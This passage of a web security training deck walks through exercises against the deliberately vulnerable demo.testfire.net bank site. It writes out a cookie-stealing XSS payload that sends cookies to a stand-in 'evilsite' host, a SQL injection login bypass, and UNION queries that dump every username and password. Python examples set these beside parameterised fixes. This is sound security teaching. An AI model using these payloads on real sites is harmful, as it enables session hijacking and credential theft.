We learn: Output is not encoded

Page 89

Action: Enter JS command with cookie

We learn: The cookie is available

Page 90

Solution – Cross site scripting (XSS)

• Navigate to http://demo.testfire.net

• Search for any query term

– Output is reflected to the page

• Query: <script>alert(1)</script>

– Output is not encoded

• Query: <script>alert(document.cookie)</script>

– Cookie is available and can be stolen

• How would I exploit this?

– Social engineering - send URL of search query to victim

– <script>document.write('<img src=http://evilsite/'+document.cookie);</script>
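The reflected search page from this solution, as an added example (not the site's code): the unencoded rendering that the workshop observed beside the output-encoded one that makes the same query inert. The page template and field name are constructed; the fix is HTML-encoding every reflected value for the context it lands in.

```python
import html

# Constructed template shaped like the search page: the query lands both inside a
# quoted attribute (the search box keeps its value) and in an element body.
PAGE = ('<form action="/search.aspx"><input name="query" value="{q}"></form>\n'
        '<p>No results were found for the query: {q}</p>')


def render_search_vulnerable(query):
    """What slides 87-89 observed: input echoed back without encoding, so a query of
    <script>...</script> becomes live script in the victim's browser."""
    return PAGE.format(q=query)


def render_search_safe(query):
    """HTML-encode on output. quote=True also encodes " and ', so the value cannot
    close the attribute early; < and > cannot open a tag in the body."""
    return PAGE.format(q=html.escape(query, quote=True))


def contains_live_tag(rendered, tag="script"):
    """Crude check for the demonstration only: is an unencoded opening tag present?"""
    return f"<{tag}" in rendered.lower()
```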

Page 91

Task 3: Login without credentials

• Step 1: Find the login page

– Can you create an account?

– Can you determine a valid username?

• Step 2: Can you cause an error?

– What information do you learn when you cause an error?

– What database is this using?

– What are techniques that you might use?

– What characters terminate a SQL statement?

• Step 3: Exploit

Page 92

Action: Username, no password

We learn: Uses client-side JS validation

Page 93

Action: Enter your name into the username and a single tick into the password

Page 94

We can guess that the login code builds its query like this:

SQLQuery = "SELECT Username FROM Users WHERE Username = '" & strUsername & "' AND Password = '" & strPassword & "'"

Page 95

Action: Enter your name, a tick, a double hyphen and whatever password you want

We learn: The double hyphen starts a comment; the result is that everything after the double hyphen is treated as a comment

Page 96

Action: Enter admin'-- and any password you want

We learn: A valid SQL statement = login

SELECT Username FROM Users WHERE Username = 'jsmith' AND Password = 'demo1234'

SELECT Username FROM Users WHERE Username = 'admin' OR 1=1 --' AND Password = '1'

Page 97

Solution – Profile the login page

• Navigate to http://demo.testfire.net/bank/login.aspx

• Enter sample username without password

– Usage of client-side JavaScript

• Enter sample username with password

– No credential enumeration

• Enter sample username with single tick (') as password

– SQL injection vulnerability

– Verbose error messages

– Column names of username and password

Page 98

Solution – SQL Injection

• Enter sample username with password of '--

– Double hyphen comments out the rest of the SQL statement

• Enter probable username (admin) with special characters appended '--

– Successful exploitation of SQL injection

Page 99

Task 4: Steal all the usernames and passwords

• Step 1: Find a page that lists information

– What page lists information?

– Does the page accept user input in any way?

– Think about how this information is pulled from the database.

• Step 2: Find the vulnerability

– How do I manipulate the input to find a vulnerability?

– What steps should I try to "break the system"?

• Step 3: Exploit

– What steps are required to make this happen?

Page 100

Action: Start in current session

We learn: The admin has no bank accounts

Page 101

Action: Enter some date in the future

We learn: No user activity

Page 102

Action: Single tick in form field

We learn: Vulnerable to SQL injection; column named userid

Page 103

Action: Enter username and password

1/1/2010 union select 1 from users--

We learn: Requires four columns in query

Page 104

Action: Enter four columns in query

1/1/2010 union select 1,1,1,1 from users--

We learn: SQL injection succeeds

Page 105

Action: Enter a valid SQL command. We already know 3 columns (userid, username, password) and a table in the database:

1/1/2010 union select userid,null,'username: '+username+' password:'+password,null from users--

We learn: All the usernames and passwords

Page 106

Solution – Find the vulnerability

• Use technique from the last task to login

• Find a page that lists information from the DB

– http://demo.testfire.net/bank/transactions.aspx

• Enter a single tick (') in the first form field

– Vulnerable to SQL injection

– Verbose error messages

– Column named userid (we already know about username and password)

Page 107

Solution – Complex SQL Injection

• Query: 1/1/2010 union select 1 from users--

– Error message about matching columns

– Learn that table users exists

• Query: 1/1/2010 union select 1,1,1,1 from users--

– Successful in executing query

• We already know 3 columns (userid, username, password) and a table in the database

• Query: 1/1/2010 union select userid,null,username+' '+password,null from users--

– Successful exploitation
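The login bypass from slides 94-98 and the UNION column-count probe from this solution, reproduced against a constructed SQLite stand-in for the bank schema, beside the parameterised queries that defeat both. This is an added example, not the Altoro Mutual application's code: the table layout, sample rows and the unquoted date splice are assumptions, and the SQL Server '+' concatenation of the deck's final payload is not repeated here.

```python
import sqlite3


def make_demo_db():
    """Constructed in-memory stand-in for the bank DB; table and column names are the
    ones the verbose errors leaked (slides 97 and 106). Passwords are stored in clear
    here only to mirror the exercise; real systems store salted hashes (slide 66)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (userid INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE transactions (userid INTEGER, txdate TEXT, description TEXT, amount REAL);
        INSERT INTO users VALUES (1, 'admin', 'constructed-admin-pw');
        INSERT INTO users VALUES (2, 'jsmith', 'demo1234');
        INSERT INTO transactions VALUES (2, '2010-03-01', 'Deposit', 100.0);
        INSERT INTO transactions VALUES (1, '2010-03-02', 'Fee', -5.0);
    """)
    return conn


def login_vulnerable(conn, username, password):
    """Same shape as the query guessed on slide 94: input spliced into the SQL text, so
    a quote ends the string literal and -- comments out the password check."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised: values travel separately from the statement, so quotes and
    comment markers in them are only data. One generic failure result (slide 63)."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def transactions_vulnerable(conn, userid, after):
    """Date filter spliced in unquoted, which is what the UNION payloads rely on."""
    sql = ("SELECT userid, txdate, description, amount FROM transactions "
           f"WHERE userid = {int(userid)} AND txdate > {after}")
    return conn.execute(sql).fetchall()


def transactions_safe(conn, userid, after):
    """Parameterised: the whole input is compared as one date value; no second SELECT
    can be appended. Real code would also reject anything that does not parse as a date."""
    sql = ("SELECT userid, txdate, description, amount FROM transactions "
           "WHERE userid = ? AND txdate > ?")
    return conn.execute(sql, (userid, after)).fetchall()


def run_vulnerable_probe(conn, userid, after):
    """Return (rows, error_text): the error text is what a verbose error page would hand
    an attacker, e.g. the column-count mismatch seen on slide 103."""
    try:
        return transactions_vulnerable(conn, userid, after), None
    except sqlite3.OperationalError as exc:
        return [], str(exc)
```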

Page 108

Questions

1. Understand reconnaissance and profiling

2. Hands-on: Find vulnerabilities and exploit

a) Forceful browsing and information leakage

b) Cross site scripting (XSS)

c) SQL Injection

d) Advanced SQL Injection

3. Understand the difference between a vulnerability and an exploit

Page 109

Module 4: Automated Techniques

Page 110

Objective

1. Understand how automation can help uncover vulnerabilities

2. Demonstration of automated vulnerability assessment

3. Understand the limitations of vulnerability assessment

Page 111

Welcome to AppScan

• Double click on Watchfire’s AppScan

• Choose Open

Page 112

Pick a Template

• Choose Default under Predefined Templates

Page 113

Type of Scan

• Select the type of scan you wish to perform

• Select Web Application Scan

• Click Next

Page 114

What to scan

• Select the scanned application

• Type http://demo.testfire.net

• Click Next >

Page 115

Login

• Choose Automatic login

• User name: jsmith Password: Demo1234

• Click Next

Note: you may want to choose the record option and follow the steps

Page 116

What to test

Select the test policy

• Click on ‘Load’

• Select ‘Application-Only’

• Click OK

• Click Next

For this exercise we will test just for application level vulnerabilities

Page 117

Start the scan

• Select ‘Start a full automatic scan’

AppScan will perform Explore and then execute Tests

Page 118

View the results

Page 119

An Enterprise Vision

Page 120

Asking the Wrong Question

(Figure: the roles QA / Test, Security Auditor, Business Owner and Developer, each asking a different question)

• Why isn't the app working?

• What's wrong with the code?

• Where are the bugs?

• What is our risk exposure?

Solution: What are the root causes?

Page 121

Understanding the Root Causes (Solution)

1. Takes the focus off the symptoms

2. Eliminates over-reporting

3. Highlights pro-active security

4. Can help build education programs

5. Chasing vulnerabilities doesn't work

Page 122

Online Risk Management for the Enterprise

People

Process

Technology


Page 123

The People Factor

• Repeatable, measurable education system

– Eight principles of security

– Six primary threat classifications

• Resource library

– Corporate policy

– Best practices

– Specific process with security artifacts

• Feedback Loop

– Development, QA and Internal

– Support and External

• MEASUREMENT


Page 124

The Process Factor

• Defined secure lifecycle

– Risk Profiling

– Architectural Risk Analysis / Threat Modeling

– Defined inputs and outputs

– Checkpoints and Gates

• Feedback loop for process improvement

– Internal

– External

• MEASUREMENT


Page 125

The Technology Factor

• Automated analysis

– Strengths

• Technical vulnerabilities

• Scale and cost

– Weaknesses

• Architectural and logical design flaws

• Manual analysis

– Strengths

• The “human factor”

• Design flaws

– Weaknesses

• Costly (time and money)


Page 126

Security Considerations in the SDLC

The Foundation: 1. Playbook, 2. Resource Library, 3. Enterprise Metrics, 4. SDLC, 5. Training Program

• Define – Assign Security Expert; Risk Analysis

• Design – Architectural Risk Analysis; Threat Modeling; Abuse Cases

• Build – Component Testing; Peer Code Review; Build Testing

• Test – QA Testing; Formal Security Assessment; Formal Code Review

• Deploy – Quarterly Audit

Page 127

Outsourcing?

The Foundation

1. Playbook

2. Resource Library

3. Enterprise Metrics

4. SDLC

5. Training Program

Define

• Assign Security Expert

• Risk Analysis

Test

• Formal Security Assessment

Deploy

• Quarterly Audit


Page 128

Foundation Components

• Playbook

– Corporate Policy

– Exception Handling

• Resource Library

– Security Principles

– Threat Classification

– Certified Components

– Feedback Mechanism (Inside, Outside)


Page 129

Application Security - When?

[Diagram: timeline across the Define, Design, Build, Test and Deploy phases, with two testing tracks]

• White Box track: Code Review, Build Audits, QA Audits

• Black Box track: Risk Profile, Threat Modeling, Component Tests, Build Audits, QA Audits, Security Assessment, Quarterly Audits

Page 130

Financial Impact

[Chart: Cost to Fix dramatically increases the longer you wait to test]

Page 131

Security Testing In the Software Lifecycle

[Diagram: SDLC stages Coding, QA, Security and Production; labels shown: Build, Developers]

Page 132

Application Security Maturity Model

[Chart: axes "Difficulty & Cost of Test" (Low to High), "% Applications Tested" (Low to High) and "Criticality & Risk of App."; three phases shown: Phase 1 (Security Team), Phase 2 (Security Team, QA Team), Phase 3 (Security Team, QA Team, Development Team)]

Page 133

Q & A

Questions?

Page 134

Additional Resources

• OWASP

– www.owasp.org

– Top Ten List

– Secure Development

• Web Application Security Consortium

– www.webappsec.org

– Threat Classification

– Web Hacking Incidents Database

Page 135

Additional Resources

• Download AppScan 7.6 - http://www.watchfire.com

• Latest whitepapers: http://www.watchfire.com/news/whitepapers.aspx

• Visit Watchfire at one of our upcoming shows: http://www.watchfire.com/news/events.aspx

• Register for upcoming web seminars: http://www.watchfire.com/news/seminars.aspx

• Contact us at [email protected]

Page 136

Thanks for joining me today!

Armando Bioc

Office: 650-592-5274

[email protected]

www.watchfire.com/securityzone